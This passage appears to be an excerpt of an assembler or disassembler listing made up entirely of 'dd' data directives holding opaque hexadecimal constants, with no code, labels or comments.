		dd 0CBF5E20h, 1BE0FC7Bh, 886338AAh, 3B01802h, 1195AE31h
		dd 0D6989AC4h, 7C2101F5h, 0AA440FA9h, 26E4CF08h, 72D810D0h
		dd 2D91D2C2h, 8A152481h, 9E64636h, 82594B1Ch, 68C4D148h
		dd 1F0C0495h, 0D19909DCh, 0B0CC13EFh, 300D201h,	0E4B04262h
		dd 8A749F03h, 0A65F4A28h, 50447D26h, 0E9990D62h, 0BCA05383h
		dd 304DF462h, 123E9681h, 0B3A66EFAh, 10385824h,	0A0909328h
		dd 221A6E2Fh, 2D0A4C3h,	68A48823h, 4114A9C2h, 901C10E4h
		dd 0B199811Ch, 0DCAA8333h, 47C12E19h, 5FE3CB5Ah, 25A1BA4Dh
		dd 0C5C3CEDh, 9662003Bh, 4F5C3F92h, 4A0FA328h, 0A7268408h
		dd 32E6AFF8h, 79FD0589h, 0CEFCD860h, 41FC85F2h,	1A31023Ah
		dd 0EA0711A8h, 1CFCD7CFh, 6461FC88h, 0FC86AF2h,	5B0381E7h
		dd 17C421E8h, 0A6C56348h, 0E4CC9344h, 0B7831506h, 0A262CE04h
		dd 9724FEDDh, 0E94009CCh, 1CBA139Bh, 7603722Fh,	308C49B0h
		dd 82299E10h, 40207648h, 0DC586AC4h, 0B307EC02h, 87AE9787h
		dd 9120057Ah, 1B286866h, 74C6154Fh, 745950D0h, 2E83BA1h
		dd 0EC1C1E08h, 0CD52A1AEh, 0AE421DDEh, 0FF856882h, 0E36A0A9Ah
		dd 0FB17697Fh, 0D26E348Ah, 0C04A2879h, 0F69449BFh, 0EE944913h
		dd 0DF841113h, 5F7F0913h, 2DE0AC83h, 370E1701h,	0FFF332BAh
		dd 0A4BE1EEBh, 3C0113CBh, 97599052h, 1CD590B2h,	4C44606h
		dd 0FFFD8477h, 35AA1A4Bh, 0AC888344h, 0DD12C8E4h, 0FF740217h
		dd 209C0881h, 1FBF862Ch, 88451F44h, 1D06A3D3h, 287D22Ah
		dd 20D2D08Dh, 35A9AC16h, 12C03E14h, 1F4F4872h, 88EB206h
		dd 0A052E50Ch, 82F7CD06h, 0A1873FEBh, 33AB4070h, 5655F60Eh
		dd 3A86C2EEh, 0D8508A88h, 9847DF61h, 3D775D22h,	0EB22D84h
		dd 75BDABD5h, 3CA00B9Fh, 3B32448Bh, 28AE728Bh, 0D1F8018h
		dd 23F969E6h, 445FB46Ch, 802CA33h, 56A33D49h, 2D918C82h
		dd 82652116h, 93740ACAh, 562E2A89h, 5654C8D2h, 0CF7FCFB9h
		dd 82F29DC8h, 20FCC1DDh, 0BDD32A14h, 860BE218h,	4B183D74h
		dd 0E64C3021h, 0F51E367Ah, 9B421652h, 22304E32h, 8AE410DCh
		dd 47F922ECh, 25F6594h,	328A1B51h, 0D2968D2h, 1AC42487h
		dd 0F31099C5h, 3F670B17h, 21D485D5h, 0CC90723Eh, 98714879h
		dd 0A2C236B7h, 25AB1D2Fh, 0E576635h, 1E0939C9h,	0E907E18h
		dd 9E73177Bh, 0EC37C35Fh, 0C8F965EBh, 4E3FBAF0h, 52A8F70Ch
		dd 0C230CFD5h, 5D602386h, 9AC4448Fh, 0E95898BEh, 882E73A4h
		dd 10B30FB7h, 0A3715391h, 6846240h, 0F55C03FEh,	40A4ECEDh
		dd 95E4A218h, 0BD1BBA41h, 3877403Eh, 69A69C0h, 7000BA26h
		dd 0B8C76478h, 37407875h, 0FE0A8177h, 6D61B8B2h, 90C04021h
		dd 177EEB0Ah, 786BAFDDh, 0FB8B93CDh, 0CCD12FF3h, 11666D38h
		dd 0C2164375h, 9B279CDDh, 9F00AD2Bh, 0CAA69EF9h, 0F82D2Bh
		dd 2E91307Dh, 7007E9F2h, 0F8BA3BF4h, 56E12077h,	0E563FB71h
		dd 0A153AFB0h, 0B541B8A0h, 8A7EB415h, 97935420h, 40810555h
		dd 0C6607BE0h, 3AC7AE0h, 1D02043h, 5DD03E9Ah, 8C651Ah
		dd 0E2F40CD2h, 93B6310Ch, 4B2516FFh, 23B7C097h,	0F4AF005Fh
		dd 2E95CF70h, 57BC31h, 4ED1E755h, 0B83AA0A4h, 3E08CD5Bh
		dd 0E643A857h, 542A471Dh, 28927D1Dh, 3E11CAB0h,	0A1715A1Fh
		dd 0CD764BACh, 1D7E4E3Bh, 12AE9347h, 0B995E00Eh, 6F433BF7h
		dd 0E86008F3h, 9B41359Eh, 41C15799h, 0D87238BDh, 0ACBEF5E6h
		dd 909819Eh, 0BE9F6094h, 9F0A006Ah, 80E469Eh, 5C861221h
		dd 0BAF1140h, 0B442382Ah, 52188861h, 7FC5FB05h,	91C597FDh
		dd 0F5753212h, 0C56A4340h, 3C5FA178h, 431028D1h, 0DE4562CBh
		dd 6C03524Eh, 0DEBE0001h, 8196FF1Ah, 0A0C80584h, 0DF650462h
		dd 4C591C39h, 0FF59E49h, 9DD42494h, 0EB704019h,	46BACA0Eh
		dd 0C3376900h, 5413028h, 1502123Dh, 2B5496AAh, 8224C823h
		dd 0DD4195B8h, 1A46E29Bh, 1960963Fh, 29268654h,	5346A2ABh
		dd 8195794Fh, 41E159E4h
		dd 7D7BBD18h, 0D46817Ch, 90CEB0A7h, 424A203Bh, 0B3ADCFF0h
		dd 0A42905C2h, 0E8729F42h, 0F1058B4Fh, 20388613h, 2607FF2Ch
		dd 0C0083E08h, 0DA8AC30Fh, 0D6F9C42Ch, 33E9C3FCh, 0B0C4A90Dh
		dd 0FBAC606Fh, 0D233E17h, 802929FDh, 3FE99702h,	4258C13h
		dd 4A79055h, 0BFAA6013h, 0CCEB71F8h, 4169909Ah,	1AC083D1h
		dd 755CEBF5h, 0C154FE43h, 68164990h, 0A27E5712h, 0AFC28A11h
		dd 5497BE8Bh, 0BEDC605Bh, 8CE28090h, 4BFE6483h,	405E9A32h
		dd 66C67D36h, 44A64383h, 0EE578D0Fh, 949EA155h,	59CD4B6Eh
		dd 0DE4ACA57h, 0B2C32A2Fh, 10AA29D1h, 73780292h, 82014F91h
		dd 0D8411D80h, 0FCC3EA57h, 0C7BF2207h, 0E09BE870h, 4326FF3Bh
		dd 676D8301h, 9DC5C080h, 0DC3A5153h, 1D807A2Ah,	0AA624A07h
		dd 0EE0F5B60h, 0A789EAB0h, 153CA9A0h, 8BA295B1h, 9B5171D6h
		dd 76798C68h, 0EFDA6CDFh, 60142487h, 4C0C8101h,	99BEF6FCh
		dd 0D5641A96h, 8246CDF5h, 0EFD0B4CAh, 0FC2DC823h, 29042C70h
		dd 5B4AF280h, 1E2E1AE8h, 0C52A04E0h, 0FF31F5DCh, 0B72D6305h
		dd 970B442Fh, 0F336F02Ch, 8817D700h, 0C131E7AAh, 0D0356698h
		dd 542890D1h, 89CF570Ah, 4B4A123Dh, 86550868h, 401C427Eh
		dd 0EFA918Bh, 0B912B97Ah, 7AAC199h, 8611EB46h, 74AB3CEAh
		dd 2805E55Dh, 71F82C11h, 26DFE900h, 6B9A1093h, 0BC38587Ch
		dd 3B95CC3Ah, 32D947ACh, 0AF540FBDh, 184F4277h,	8D30237Eh
		dd 0B9B8B29Bh, 8716451Eh, 0F9BEAAC5h, 0AC53700Ch, 80C798AAh
		dd 0E6440954h, 1CFE5751h, 688115CBh, 0C8FB579Eh, 1FC105Fh
		dd 47C0DEDh, 752DB3FDh,	16ACF5B1h, 5550949Eh, 50D5C982h
		dd 65B97C97h, 0FF1977D3h, 6AD7F682h, 0EB70C540h, 910D474Ah
		dd 0C6842E75h, 0C05C8176h, 0C2311122h, 0A04956B2h, 0FBE6FB1h
		dd 1477DF4Fh, 5A833ADCh, 541FD3C8h, 0FA7814FCh,	4ECE280Eh
		dd 0A315F1DFh, 90C58BB2h, 0A96AD380h, 0BCD45CBAh, 4882833Ah
		dd 1FE12D10h, 1545F3F5h, 3FE29018h, 0C2B1EFBBh,	26B10CF5h
		dd 2AB8AACAh, 68EBD92Bh, 0C5C503FAh, 14ECF3CDh,	0A9B258B6h
		dd 0FAE02114h, 39F74630h, 7C373CEEh, 4DE61DDAh,	7003143Bh
		dd 2D2B2E93h, 5A6B3A8Dh, 0EA53EEC4h, 6FF5B464h,	35187D1Dh
		dd 0E212E6A4h, 95E8B8EAh, 0ABE7BA57h, 52F0C18Dh, 0A2D0A274h
		dd 0FA96CBACh, 0BA26AB90h, 75EE09B8h, 7DC7A4Dh,	0B32E3E62h
		dd 0F9877B32h, 1A77EC3Bh, 56F06ACDh, 732DF7BFh,	9B272755h
		dd 4E3D54D0h, 9D2D4BD1h, 73CED270h, 0AAC3ABBFh,	0BFC8E076h
		dd 0B86236E9h, 59578B86h, 0C74D4955h, 0ED7D364Dh, 1D8C1D1Dh
		dd 6D5040A2h, 0C89C6C12h, 1B3AABAFh, 989F7DF8h,	0AFF8E803h
		dd 31D4CCADh, 0D1A6BAEFh, 0C2281011h, 8EB48E54h, 0F6C00961h
		dd 0F5DF181h, 3A8CBA64h, 2AEB6C4Eh, 7C4CEF01h, 4835145Eh
		dd 565F2666h, 0CC8BD279h, 55D27086h, 0B5069D92h, 2E2F5611h
		dd 0C0BE12E0h, 0BE8ADF2Bh, 0D9E8CAB6h, 4157042Dh, 40591EBAh
		dd 7F6D7082h, 931B3F85h, 2AE6A903h, 0CE0665E0h,	0ABE6D765h
		dd 0F21D5471h, 3E09895h, 30B26169h, 969CC6F9h, 2CD0AEA0h
		dd 7D8AEFD8h, 959F74D1h, 518A4B37h, 929D5499h, 0C900929Fh
		dd 7556839Eh, 0AB4287FDh, 0FC02BFA7h, 686A06CFh, 0E15620D6h
		dd 3ECE9D72h, 25155382h, 4FCB2484h, 794D428h, 6D573868h
		dd 32D808D7h, 0B33DB72Ah, 8878143Ah, 1E21C82Ah,	0D6243355h
		dd 8964E080h, 0FF2C65F6h, 62B9345Dh, 1DA8E634h,	441C55F8h
		dd 0B7740535h, 95343602h, 7F58C759h, 3E3CE9FCh,	95BFB7DCh
		dd 77F11453h, 0A38A09E3h, 0E56A0367h, 1945A963h, 0DDFF1DBh
		dd 0C7F35EF5h, 0B112BABh, 0C4C1E8AFh, 0AAF2E241h, 9F457B75h
		dd 0AF17CE75h, 0E6E6D2B2h, 23E511FCh, 0E9902F91h, 0D6622BCCh
		dd 5FC21505h, 87E221C9h, 37F37FAh, 262F38C3h, 955C77D8h
		dd 3554F9D8h, 0C65D4DD5h, 92B4279Fh, 0EE9062FAh, 0C2CE69A4h
		dd 21753E77h, 601D2E95h, 4A5BE2EBh, 6A3A8E18h, 0F90A8C6Fh
		dd 5328212h, 17C3BFC1h,	8FA9E457h, 0E4EFF5BAh, 5F09D74Dh
		dd 323F6A14h, 35FDD4DBh, 0F6BB5788h, 8FC34381h,	5E11F3D7h
		dd 59E0AEC2h, 484220C1h, 1B93320Dh, 4FD14CEEh, 415D4B3Dh
		dd 0CAA2F69Ch, 0ADB75B97h, 0BD9D067Fh, 0F71BD3D7h, 0DCEDFEEFh
		dd 0F991E0EEh, 0C75A7537h, 0B09EA2BDh, 2DA488BAh, 0E80A7C0Ch
		dd 2F5E49DFh, 0D28B5233h, 0BACA457Ah, 0C3A6E67Ch, 0FB1358BFh
		dd 6523EA2Ah, 38C00665h, 8B201B85h, 0C43D9C7Dh,	0FA3235BEh
		dd 2BC704A0h, 6DD9378Eh, 32A9518Dh, 0AABC0755h,	55A12BF9h
		dd 9B4940C5h, 0E57BACEFh, 7787F212h, 248C8757h,	2997B2DEh
		dd 42182AA2h, 18C86713h, 5566EA38h, 0B5546541h,	71D79A91h
		dd 8AE148EAh, 0F18FF286h, 4139B055h, 3AF560FCh,	59EED294h
		dd 0C68E465Dh, 0FB6AC720h, 0DBC0C421h, 8CC50C11h, 40B88AB5h
		dd 0F14A1C92h, 0F54E10FDh, 4FE1BAE9h, 0FEDB8FE1h, 684050C0h
		dd 7AA9AE86h, 409042BAh, 38753011h, 0A488F22h, 0E1D827B8h
		dd 4649DA62h, 6BC5DA64h, 0CA808A28h, 0FAE48129h, 7304E20Ch
		dd 0D7E8EC16h, 0F1F9840Bh, 0D60DBFC0h, 937C2F0h, 0ABE6189h
		dd 4942547Ch, 925276C3h, 0B207DB00h, 0B4A22500h, 0C5F3C756h
		dd 0E062BB94h, 0A262170Dh, 0AB3E15DCh, 57BC9E16h, 0CD325DEh
		dd 826506FAh, 0CA3265Dh, 19FD97D7h, 0F1603B31h,	0F29B2Dh
		dd 2FC7EF5Eh, 0FE2804FEh, 2A0C31B3h, 221D284Eh,	50B04CAEh
		dd 49A1462Ch, 0DD7E1270h, 6FF284E4h, 8B53738Ah,	1546BCECh
		dd 0C2A192C7h, 0EB01A444h, 93C440FCh, 0E75C4CB0h, 0A003B144h
		dd 0EAFBA0D4h, 3F3615D7h, 80FCA6E2h, 98006789h,	8349D95Bh
		dd 0F429A515h, 0C4C2EFC5h, 338E1809h, 54F1E9FAh, 0D4666406h
		dd 80D25189h, 0A814B775h, 5D220CC2h, 0E0842084h, 15B9C7D9h
		dd 0EEE4C80Dh, 4A5E8349h, 0A06261EFh, 1ABA957Eh, 19AEA2C9h
		dd 61538BA1h, 5B1E9197h, 5F0C129Dh, 18B5250Fh, 0EB884AC6h
		dd 81962209h, 7B24AC9Fh, 0AC107712h, 0A2A4C0C8h, 89854769h
		dd 0C5FCBF06h, 0B8A53356h, 981F2E8Fh, 0F38CA81h, 9C7CDD7Dh
		dd 0D4EFB1h, 0B2D9D3F0h, 0DED5BAF8h, 4A9D301Ch,	226460B5h
		dd 482A5949h, 6772A27Dh, 0F4FA64A8h, 8CEEF3Eh, 857CCBDDh
		dd 0E7F0FB2Bh, 0B18BD41h, 804C8B1Dh, 0DD61E3B6h, 0A46F6Bh
		dd 56276E8h, 36C132FDh,	0CE58BA6Ch, 0E5989384h,	5EBDC12Eh
		dd 7E844424h, 2EABD601h, 0F66848F6h, 3E5C145Eh,	73A643Fh
		dd 8835CF27h, 0F2CA96AAh, 293BF881h, 0B14C9763h, 5A5F462Fh
		dd 83711CFEh, 31B7E775h, 0B8EBA066h, 0C1AA380Bh, 614617E8h
		dd 5AF431A6h, 0B1407B4Ch, 0CEA952Ah, 61C8A622h,	8E416144h
		dd 2A776481h, 0FA954F83h, 57DEFEEAh, 4F5A7C5Ah,	590581D7h
		dd 0F47A300Eh, 772D4DFCh, 380367DBh, 78C46F95h,	6A2E1B4Eh
		dd 0D3E038D0h, 4B802E8Eh, 48BCCEFAh, 0FD809209h, 0D19AC17Eh
		dd 97C85096h, 0D45A762Ch, 0FF915666h, 0F840BFF7h, 10A28362h
		dd 258F827Dh, 88D67116h, 9773B417h, 985DF861h, 93E10139h
		dd 0EED661EEh, 7E13413Ah, 3EF454BFh, 0BF3724DBh, 761314A3h
		dd 2964AA8Eh, 8808A426h, 0AA651E4Ah, 90FA750Ah,	8B5134C1h
		dd 8FDD7A59h, 0BCD47E94h, 3D7AD630h, 9B9B2CAAh,	0F0AB5BDFh
		dd 349C8776h, 3186F78Eh, 0EF512CA2h, 959355EBh,	23439584h
		dd 0A2BC02C5h, 12B3E04h, 94E0C761h, 0C0DD507Ch,	93E47630h
		dd 0D1ED03E3h, 30963E12h
		dd 9888C345h, 32BB5D20h, 52A6FFAEh, 0A33B3D77h,	0FC30BA78h
		dd 489BC559h, 9F3A2624h, 4576FE59h, 0AD92268h, 0D11379F6h
		dd 0D2C78E01h, 0F4535A48h, 0E24C7738h, 3A60AAB4h, 0CD33D5BBh
		dd 7BC2A04Eh, 0C1651396h, 0FBB46B1Eh, 7959EA3Ah, 3A5CDEB5h
		dd 0CB90A546h, 0F171C02Ch, 7A4A6D36h, 0A6BD4D1Dh, 88349A6Fh
		dd 0FF8D90E8h, 0B40EDE2Ch, 11693310h, 0C5F9335Ch, 0F26BA5C7h
		dd 0E3A520EBh, 0BDAA2E53h, 4E477A7Fh, 5D8261E5h, 2AD7CA56h
		dd 0CA10B0FCh, 0BD450CEFh, 0AEB0EBC4h, 0B92B5208h, 0CC66485Bh
		dd 1B5E857Fh, 0E01BA453h, 539F812Eh, 232C1299h,	60BFE715h
		dd 3F094044h, 0FB99E4h,	82E49657h, 0BB8AC8ACh, 68A9D7B0h
		dd 60554904h, 0B550042h, 0ABFDD43Ch, 78209595h,	441AC892h
		dd 9D4E978Ch, 0C0048CA4h, 0C482A7EAh, 7BFD1D94h, 787C2999h
		dd 5C31C9C0h, 3502050Ch, 49B9108Eh, 1F690644h, 17C83257h
		dd 0FE2E9922h, 14A6BA09h, 13B3BB18h, 2F4629A6h,	0E36D174Fh
		dd 3F06FBF6h, 0E589089Eh, 70E407C2h, 50B53395h,	0B50E5BAh
		dd 0D006EC70h, 7A8C7D63h, 55854726h, 0D6509B0h,	2468B3D7h
		dd 2816D2FFh, 0AABA5566h, 318B2939h, 10F56304h,	0F26E3311h
		dd 0F89EC3DDh, 0C2071452h, 0BF8B2210h, 0F07A6269h, 5527BC21h
		dd 0F41130DBh, 87F0AAABh, 557E8FC3h, 0EAF0EFDBh, 57F0A6E2h
		dd 0FDFB491Dh, 0A6581590h, 33034161h, 14FBC7D4h, 82CC8E1Eh
		dd 0E013F66h, 0E48D1C49h, 3E189ECh, 0D6DFDA05h,	5601B88Bh
		dd 3F59E411h, 0CC414FA4h, 5EB0C834h, 33BC4DFFh,	9624914Bh
		dd 0B5A0748Ah, 0A8B00F86h, 3D846F7Ch, 0C71BA8FDh, 8A3309A4h
		dd 9E574639h, 0E28080FCh, 614880D0h, 9FC5D046h,	2F4F5FBh
		dd 72D588Ah, 6223E6EBh,	4FFBC39Dh, 40CE1EB8h, 81FF82C6h
		dd 976B405Eh, 4C1562ADh, 0A06E74B5h, 5F01603Bh,	8C15DB2Ch
		dd 98AB3871h, 65790191h, 4BB96334h, 61D34B82h, 92B9F514h
		dd 3E9C6898h, 0E2A79AD2h, 0F46FAD93h, 9273598Dh, 1DC210C5h
		dd 37AE8772h, 0FA7D72BAh, 3E9914CCh, 0ECAEFB11h, 0CBCD5ED4h
		dd 6E7D2FFCh, 70CA7C92h, 706E17E6h, 9D46E848h, 654F519Ah
		dd 0E60DA4A3h, 0BFBB77E7h, 0C3170053h, 0D3BA27C7h, 0BD2BC127h
		dd 0FF05C2F0h, 2E51E47Ah, 0D42E5051h, 46D7741h,	9B00C137h
		dd 3E891824h, 4612026Ah, 0CB480AB9h, 33922E8Ah,	0B628C01Bh
		dd 82634048h, 28A39A9Eh, 456CECE4h, 0B3A495D1h,	744A78B9h
		dd 48BA7E54h, 0ED3E736Dh, 4EF8C098h, 0B7192CFDh, 354AA3A1h
		dd 17C029B7h, 51898ABBh, 0A3523982h, 8465DDD5h,	81F126D3h
		dd 0D98340E6h, 0AA089F1h, 0FEEC8A3Eh, 731822E2h, 0F374C8D0h
		dd 0E500DBB9h, 17F83823h, 77C26178h, 0D61D6BAEh, 28CC8E60h
		dd 8511EB81h, 470BCA38h, 0B8238159h, 0F64DC2F5h, 354F5CE5h
		dd 7619F72Ah, 0FD822425h, 98307C5Ch, 0D9C4CEB5h, 4B576255h
		dd 0E2807945h, 514E2B48h, 0B8CBBA14h, 60AF7316h, 0CE51C268h
		dd 0F71C6207h, 0F914A70h, 7AEEEA8Ah, 0B51057DCh, 1868A38Ch
		dd 83AA5F60h, 0B3177CEEh, 0F53C89EAh, 370024C1h, 39D08565h
		dd 9BB6AB17h, 5CE4456Fh, 53846B8Ch, 171CE116h, 76EF8FDDh
		dd 52900B97h, 0F0C50947h, 4470EFD0h, 0B3C90DD0h, 0F7254F31h
		dd 57C88319h, 463298F2h, 5D8B73A6h, 0DEBA8A8Dh,	4E505DA3h
		dd 382CC06Fh, 0CBE487E7h, 0A8097E9Fh, 9774B57Eh, 0A0F444EBh
		dd 2EB8562h, 57FF7C27h,	9D0F9C4h, 8723CA43h, 2ECC7284h
		dd 0AE389CA4h, 29196D37h, 4841C0D2h, 7594A719h,	0C596948Dh
		dd 1436E2Fh, 4859E95Fh,	0F1D645ABh, 49159F11h, 49FC6059h
		dd 78B069B7h, 0C0291CE0h, 195FDD23h, 9826412Dh,	2FD71F15h
		dd 655AC9BEh, 0F5C53060h, 4A75656Ch, 15F8D1D9h,	8596B51h
		dd 8E2A554h, 42D7C60Dh,	560156Bh, 0D0A36844h, 0B7CA2A9Ah
		dd 2E3B954Fh, 9DD8A9C6h, 61BCE44Dh, 63582E41h, 0F47754B8h
		dd 0FA658027h, 5E9A3CF7h, 0D3BDD7E0h, 5EB00196h, 2959FBEh
		dd 5D1D5BBEh, 4014C54Fh, 369F594Eh, 0D3D67197h,	0CC7FE5D6h
		dd 0DEF13368h, 5B5938Ah, 0B3986081h, 73503A6Eh,	8388ED53h
		dd 91977208h, 24AA61D0h, 0A9C2C5F1h, 51CE85C0h,	28541728h
		dd 9240D67h, 5F588E26h,	0FAFDE1CBh, 7FEAE888h, 8197350Ah
		dd 43E7436Ah, 0E00D00CBh, 2D1B3716h, 0C3733DB1h, 9C899715h
		dd 8B5D45E6h, 0D9DDABF2h, 0ADA117BFh, 323000B3h, 0B8309030h
		dd 0BC3E258Eh, 9C186CA6h, 0B25BA617h, 15450FDFh, 40E7DE5Bh
		dd 7107867Fh, 7A058E6Ah, 0CF9077A7h, 4A118B38h,	74AAD70Eh
		dd 0D7D5C5F0h, 0B88CED89h, 66A1B913h, 0B59BD1A8h, 0F23833EDh
		dd 719655DFh, 0AC0B978Ch, 18AEBA93h, 3F94CF60h,	0EC0886DDh
		dd 0ACAD2053h, 0A233103Bh, 0C3D8DBECh, 0F9438656h, 3C73AA14h
		dd 76FDE515h, 2C5D72Fh,	9EBA8E3h, 29805132h, 7D413D01h
		dd 1CE4F1DDh, 895EBA0Eh, 0BCC5CB82h, 512D370Eh,	0E44732AEh
		dd 3D8148E9h, 0D4386FD2h, 244C4A6h, 6D99B26Bh, 8BCC517Ch
		dd 797C5E09h, 9A3330DCh, 514675Fh, 0DD5FA797h, 111EB2EDh
		dd 0D7019CBh, 2A04BF41h, 0B2EE96E5h, 69CE59Ah, 51A9FE95h
		dd 8BF44080h, 0F6F16D8h, 5B7D6B15h, 0FAE0BC3Ah,	8567C9A3h
		dd 0A05276A9h, 0FFE91108h, 0C4F081D2h, 317C2B13h, 27F3C442h
		dd 0D77C8960h, 838852D0h, 0BA7D4109h, 4C4F5939h, 582FFFC4h
		dd 0C651A637h, 0DF9DFE82h, 0C1ED15C6h, 3CA827B9h, 0CFB0CB8h
		dd 6864BE4Ah, 42833F51h, 0F22A3F6Fh, 0FA654CCh,	0B0AED57Eh
		dd 0FD4DFFFFh, 0EAFD4AE6h, 2628A139h, 4076DE14h, 62A44890h
		dd 0F61757F9h, 0DBD1AA7Fh, 6210B6ADh, 13C5372Eh, 5017AD54h
		dd 1D928C52h, 0D5D697F0h, 0C8553A51h, 0ACCF24C4h, 2BF571FCh
		dd 0E981E0DCh, 49D50E7Ah, 6FF93901h, 86422C43h,	0FF41C5F2h
		dd 9D317DFh, 63FE0AF2h,	5E735456h, 44412338h, 18F6AA6Dh
		dd 71D97B4Ah, 0B83E2A03h, 0BE9981F4h, 78EB3B0h,	0D85E8E4Eh
		dd 1619AC3Ah, 9E11B624h, 0F3D8112Eh, 0C1704585h, 0A34AB72Ch
		dd 5F287AB6h, 6F3ABD14h, 424D3150h, 0F2EA0BF9h,	0C75005F4h
		dd 0B111EE08h, 8E0BE29Dh, 17FC0C06h, 0B313AFC3h, 85C0D292h
		dd 0C94306DAh, 28A3E3D3h, 54D072E9h, 1A411903h,	0BDA3CEA0h
		dd 0BD241544h, 0B9590E13h, 137355C1h, 8CF0AA7Bh, 73988657h
		dd 553EDA06h, 0B55ECAD9h, 0FB15709Fh, 5F072D92h, 0D827A3D1h
		dd 957F0BEFh, 15DADAC1h, 0E03AEFE9h, 838C8848h,	8E259DA3h
		dd 8EB6611Ch, 0CAF11857h, 45A3220h, 651BD7D1h, 7545309Ch
		dd 1011B015h, 49FA76BEh, 217D09F6h, 0D03089F6h,	38AFBBAFh
		dd 61168266h, 44131D74h, 47118A27h, 0D6A62309h,	0EAF195E3h
		dd 3EEADE60h, 576BDDF5h, 0EEECC0A2h, 3F34D5F5h,	5405E660h
		dd 0A0D00B9Ch, 43A72405h, 0E2F8FD6Fh, 180FEAE1h, 0DFA04C53h
		dd 0E57F0C7Ch, 7E45C6FEh, 18D155F1h, 27233482h,	0E0F81DF7h
		dd 275E415h, 0C5423F9Fh, 0D3BF6BA4h, 5A8C553Eh,	0B566F1B8h
		dd 31CAD44Ah, 0E5F07F0Dh, 5DD1F5F1h, 0ACDAF5C7h, 0C358895h
		dd 860EE909h, 0B2BAF685h, 58FC678Ah, 8853EE6Ch,	656D5FD4h
		dd 3FCE3E47h, 148CCC0h,	0C78190C4h, 32118300h, 0DA920810h
		dd 0CBCFC0F8h, 2A208BFAh, 1E0D5A7h, 7CF6BF7h, 19DB2157h
		dd 0BC4E23DFh, 730B9959h, 0C3575D05h, 77CE0BAh,	342504C2h
		dd 0FB9CFA3Dh, 0D592124Eh, 8A56C1E0h, 5895B540h, 9A31010Dh
		dd 0B1D408D5h, 262E3C00h
		dd 517FD280h, 35616B38h, 65E829CEh, 0AEB1BE0Eh,	70205881h
		dd 0C8A8CB74h, 5FA550D8h, 4AC122D4h, 142CE60Bh,	5B2DF2BCh
		dd 38AC6DF0h, 503A51F1h, 0D3CCCACFh, 0D51166D6h, 0C0802C1Dh
		dd 0FC5FB608h, 16A8FFF4h, 6B877E96h, 8B1D118Ch,	0ADF38294h
		dd 9976E310h, 0B959F5DBh, 45AF3321h, 162191F4h,	60F903E6h
		dd 32F548A7h, 0CCB2DE0Ah, 83C3914Ah, 0D0CE250h,	7F21B4Ch
		dd 0E5CC6h, 1729C487h, 0E07A39EDh, 5E4D12B5h, 1340E378h
		dd 2F72D256h, 0C228FF11h, 7F8D80CEh, 0EFA7C0C6h, 87ADDCE0h
		dd 116A4CD4h, 0F4584313h, 0B803F8BCh, 234F950Dh, 0F9155C86h
		dd 4BEC0485h, 56B29883h, 4AF936D4h, 0F56FC5E2h,	4068087Ch
		dd 0A31EE2BBh, 44AE7A19h, 0F24ED342h, 28C91AC7h, 648EFB21h
		dd 0A77D3712h, 3D5DA170h, 5745887Eh, 52751662h,	1B74F832h
		dd 0E3260270h, 8C64AC8Eh, 75910745h, 4F793888h,	73FF9E7Dh
		dd 1D3F2108h, 0F481ED35h, 54C73B12h, 0BF1D294Dh, 3AC5DFAEh
		dd 7DE32573h, 0CF44D933h, 73150875h, 0EBF4080Fh, 85BE542Eh
		dd 0CFC53C09h, 950307BCh, 8BE220C4h, 3348542Ah,	0C515A646h
		dd 77CD707Ch, 0FA178382h, 0AC4DB664h, 0CA8AC642h, 0A035D32Ah
		dd 0EF47590Bh, 0F3B39E9Bh, 0CD728D54h, 0CCD463F8h, 0E571CCB9h
		dd 2D130CADh, 0C12401EDh, 0F59966B8h, 0E004CD5Eh, 0D19A3D18h
		dd 0CF22E19Ah, 0F5CAB58Bh, 0F4CCD3BFh, 11310857h, 0A3334242h
		dd 66CE3397h, 5EB2D71Fh, 7C998F33h, 5A2BB23Ch, 1C5FAEC5h
		dd 79EF3133h, 20CD3E91h, 0D1F32FCBh, 9E311B40h,	5A90170Dh
		dd 9E65C550h, 0ADD0E65Ch, 0E3F1C5F7h, 21334476h, 74927CE1h
		dd 7660EDB6h, 313E69DCh, 66B5D1B2h, 268DD0FCh, 4D2E5CDDh
		dd 44C5B303h, 6DD1EA9Fh, 78F39EFEh, 0A8CADB91h,	0D8E3E858h
		dd 0C8C52258h, 42CEB56h, 0C0FDFDA1h, 0C6100D97h, 0B9CEAF4Eh
		dd 23DDC562h, 5C2F44F3h, 2B0E6572h, 9CC598D6h, 0C1267C8Fh
		dd 62A8567Bh, 0D149177Dh, 6E0D0565h, 543A3F8Ch,	0BECC69F1h
		dd 993F09A5h, 46A8EDCh,	61BA9D44h, 14F6BE65h, 31BE7E31h
		dd 0A4C47DFBh, 36C64BC3h, 48CD990Bh, 83FC3940h,	9D7577C1h
		dd 0ABE49ABAh, 60851052h, 0B850C4D6h, 2EB0223Eh, 0C66B2448h
		dd 0A28548Eh, 96C9EE33h, 526DA17Eh, 2028222Fh, 504F29E0h
		dd 89D5A17Dh, 0A441DDA9h, 0CB8F045Ch, 0B9791155h, 363F551Dh
		dd 5ABB6F3Bh, 0D72E8A28h, 76E65513h, 6A4D7464h,	4235C1D1h
		dd 7CB9A10Ah, 0B37C5115h, 0F42CFE58h, 7145DD79h, 2FCD5465h
		dd 450B09E6h, 9A840D71h, 5A51FD2Eh, 3E5676E7h, 0BE3D6AA2h
		dd 0CDD011DEh, 6110ECh,	1946ADBBh, 9CD78442h, 703435C9h
		dd 67176495h, 653CC833h, 0C6D0378Ch, 0BA8CC00h,	0C0335h
		dd 0B043B8DAh, 5DE8CE21h, 95422975h, 48620F78h,	31505CE4h
		dd 82E94A6Bh, 92B29E4h,	0A2B0C2Bh, 0DBA082Bh, 5EB2042Bh
		dd 802EC0E8h, 7E615B39h, 3CBC327Eh, 4B570FCh, 4C8ECAAEh
		dd 80F40660h, 1CAB2B91h, 0CD7C23Fh, 0F5F7EDDEh,	2485314Ah
		dd 926758B1h, 2E8A212Ah, 0B3EB4EA0h, 0F436204Eh, 11C2E3AEh
		dd 0B7487A29h, 62F0F9E2h, 0FAF36812h, 0BD7A959Bh, 438C1773h
		dd 0C5C1E650h, 4CCBC118h, 8265D34h, 2A5D0048h, 4D45B32Ch
		dd 0C28E1631h, 45ADDB52h, 0EE928E8Bh, 0D2B29E4Ah, 0CAE82B2h
		dd 0E1F49D7h, 23B0E4CDh, 0FD108E7Fh, 309AD16h, 94CE2B63h
		dd 4368225h, 0AF033E50h, 0B63A837h, 67614A2Dh, 0C9E16A2Fh
